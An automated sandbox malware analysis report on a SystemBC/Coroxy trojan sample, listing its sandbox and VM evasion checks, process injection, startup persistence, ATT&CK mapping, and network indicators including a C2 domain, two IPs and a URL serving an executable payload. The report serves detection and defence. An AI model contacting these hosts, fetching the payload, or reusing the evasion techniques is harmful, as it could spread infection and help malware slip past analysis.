                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeRDTSC instruction interceptor: First address: 402E5A second address: 402E5A instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, esi 0x0000001a imul eax, edi 0x0000001d xor edx, edx 0x0000001f mul dword ptr [ebp+08h] 0x00000022 mov eax, edx 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop edx 0x00000027 pop ecx 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d lea eax, dword ptr [eax+00000300h] 0x00000033 push eax 0x00000034 push 00405C2Fh 0x00000039 call 00007F33C4532B3Ch 0x0000003e push ebp 0x0000003f mov ebp, esp 0x00000041 push ebx 0x00000042 push edi 0x00000043 push esi 0x00000044 mov edi, dword ptr [ebp+08h] 0x00000047 push 000000FFh 0x0000004c call 00007F33C45312F9h 0x00000051 rdtsc
                      Source: C:\ProgramData\faer\wopbv.exeRDTSC instruction interceptor: First address: 402E5A second address: 402E5A instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, esi 0x0000001a imul eax, edi 0x0000001d xor edx, edx 0x0000001f mul dword ptr [ebp+08h] 0x00000022 mov eax, edx 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop edx 0x00000027 pop ecx 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d lea eax, dword ptr [eax+00000300h] 0x00000033 push eax 0x00000034 push 00405C2Fh 0x00000039 call 00007F33C4F7C41Ch 0x0000003e push ebp 0x0000003f mov ebp, esp 0x00000041 push ebx 0x00000042 push edi 0x00000043 push esi 0x00000044 mov edi, dword ptr [ebp+08h] 0x00000047 push 000000FFh 0x0000004c call 00007F33C4F7ABD9h 0x00000051 rdtsc
                      Source: C:\ProgramData\faer\wopbv.exeRDTSC instruction interceptor: First address: 402E5A second address: 402E5A instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, esi 0x0000001a imul eax, edi 0x0000001d xor edx, edx 0x0000001f mul dword ptr [ebp+08h] 0x00000022 mov eax, edx 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop edx 0x00000027 pop ecx 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d lea eax, dword ptr [eax+00000300h] 0x00000033 push eax 0x00000034 push 00405C2Fh 0x00000039 call 00007F33C4532B3Ch 0x0000003e push ebp 0x0000003f mov ebp, esp 0x00000041 push ebx 0x00000042 push edi 0x00000043 push esi 0x00000044 mov edi, dword ptr [ebp+08h] 0x00000047 push 000000FFh 0x0000004c call 00007F33C45312F9h 0x00000051 rdtsc
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory allocated: D60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00402E5A rdtsc 3_2_00402E5A
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe TID: 5636Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exe TID: 2572Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exe TID: 2104Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeThread delayed: delay time: 60000Jump to behavior
                      Source: wopbv.exe, 00000008.00000002.3390352551.000000000125B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                      Source: wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: wopbv.exe, 00000008.00000002.3390352551.00000000012C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: wopbv.exe, 00000008.00000002.3390352551.00000000012C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00402E5A rdtsc 3_2_00402E5A
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00402E87 LdrLoadDll,3_2_00402E87
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00402E87 mov eax, dword ptr fs:[00000030h]3_2_00402E87
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00401000 EntryPoint,CreateThread,SetUnhandledExceptionFilter,GetModuleFileNameW,EnumWindows,GetEnvironmentVariableW,CreateDirectoryW,CopyFileW,CopyFileW,Sleep,CreateMutexW,ExitProcess,3_2_00401000
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeMemory written: C:\Users\user\Desktop\uC4EETMDcz.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory written: C:\ProgramData\faer\wopbv.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeMemory written: C:\Users\user\AppData\Local\brokerutil.exe base: 570000 value starts with: 4D5AJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMemory written: C:\ProgramData\faer\wopbv.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess created: C:\Users\user\Desktop\uC4EETMDcz.exe "C:\Users\user\Desktop\uC4EETMDcz.exe"Jump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"Jump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeQueries volume information: C:\Users\user\Desktop\uC4EETMDcz.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeQueries volume information: C:\ProgramData\faer\wopbv.exe VolumeInformationJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeQueries volume information: C:\Users\user\AppData\Local\brokerutil.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeQueries volume information: C:\ProgramData\faer\wopbv.exe VolumeInformationJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00401806 CoInitialize,GetSystemTime,CoUninitialize,3_2_00401806
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected SystemBC
                      Source: Yara matchFile source: 1.2.uC4EETMDcz.exe.2be1354.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.wopbv.exe.322d6b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.brokerutil.exe.2e1ba64.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wopbv.exe.28ed188.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2724225667.0000000000575000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2726825474.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3039485950.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2378662559.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2619060689.000000000297B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: brokerutil.exe PID: 3916, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected SystemBC
                      Source: Yara matchFile source: 1.2.uC4EETMDcz.exe.2be1354.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.wopbv.exe.322d6b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.brokerutil.exe.2e1ba64.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wopbv.exe.28ed188.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2724225667.0000000000575000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2726825474.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3039485950.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2378662559.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2619060689.000000000297B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: brokerutil.exe PID: 3916, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts11
                      Scheduled Task/Job                      		111
                      Scripting                      		111
                      Process Injection                      		11
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job11
                      Scheduled Task/Job                      		11
                      Scheduled Task/Job                      		1
                      Disable or Modify Tools                      		LSASS Memory311
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Registry Run Keys / Startup Folder                      		2
                      Registry Run Keys / Startup Folder                      		21
                      Virtualization/Sandbox Evasion                      		Security Account Manager21
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive3
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576044 Sample: uC4EETMDcz.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 41 wodresomdaymomentum.org 2->41 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected SystemBC 2->51 53 8 other signatures 2->53 8 uC4EETMDcz.exe 5 2->8         started        12 wopbv.exe 2 2->12         started        14 wscript.exe 1 2->14         started        16 wopbv.exe 2 2->16         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\brokerutil.exe, PE32 8->35 dropped 37 C:\Users\user\AppData\...\brokerutil.vbs, ASCII 8->37 dropped 39 C:\Users\...\brokerutil.exe:Zone.Identifier, ASCII 8->39 dropped 61 Drops VBS files to the startup folder 8->61 63 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->63 65 Tries to detect virtualization through RDTSC time measurements 8->65 18 uC4EETMDcz.exe 4 8->18         started        67 Multi AV Scanner detection for dropped file 12->67 69 Machine Learning detection for dropped file 12->69 71 Injects a PE file into a foreign processes 12->71 21 wopbv.exe 12 12->21         started        73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->73 24 brokerutil.exe 2 14->24         started        27 wopbv.exe 16->27         started        signatures6 process7 dnsIp8 31 C:\ProgramData\faer\wopbv.exe, PE32 18->31 dropped 33 C:\ProgramData\...\wopbv.exe:Zone.Identifier, ASCII 18->33 dropped 43 wodresomdaymomentum.org 78.41.139.3, 4000, 49813, 49815 NEO-CUSTFR Norway 21->43 45 45.155.249.199, 49821, 80 MEER-ASmeerfarbigGmbHCoKGDE Germany 21->45 55 Multi AV Scanner detection for dropped file 24->55 57 Machine Learning detection for dropped file 24->57 59 Injects a PE file into a foreign processes 24->59 29 brokerutil.exe 24->29         started        file9 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      uC4EETMDcz.exe58%ReversingLabsByteCode-MSIL.Trojan.Coroxy
                      uC4EETMDcz.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\brokerutil.exe100%Joe Sandbox ML
                      C:\ProgramData\faer\wopbv.exe100%Joe Sandbox ML
                      C:\ProgramData\faer\wopbv.exe58%ReversingLabsByteCode-MSIL.Trojan.Coroxy
                      C:\Users\user\AppData\Local\brokerutil.exe58%ReversingLabsByteCode-MSIL.Trojan.Coroxy

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://45.155.249.199/files/mailer/blue.exey0%Avira URL Cloudsafe
                      http://45.155.249.199/files/mailer/blue.exe%0%Avira URL Cloudsafe
                      wodresomdaymomentum.org0%Avira URL Cloudsafe
                      http://45.155.249.199/files/mailer/blue.exe0%Avira URL Cloudsafe
                      http://schemas.micr0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      wodresomdaymomentum.org
                      		78.41.139.3
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://45.155.249.199/files/mailer/blue.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        wodresomdaymomentum.orgtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netiuC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJuC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.000000000396C000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2744031290.0000000003E98000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3063157374.00000000042A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://stackoverflow.com/q/11564914/23354;uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/2152978/23354uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  http://45.155.249.199/files/mailer/blue.exe%wopbv.exe, 00000008.00000002.3390000700.0000000000DEA000.00000004.00000010.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://github.com/mgravell/protobuf-netuC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    http://45.155.249.199/files/mailer/blue.exeywopbv.exe, 00000008.00000002.3390352551.000000000125B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.micruC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.microuC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
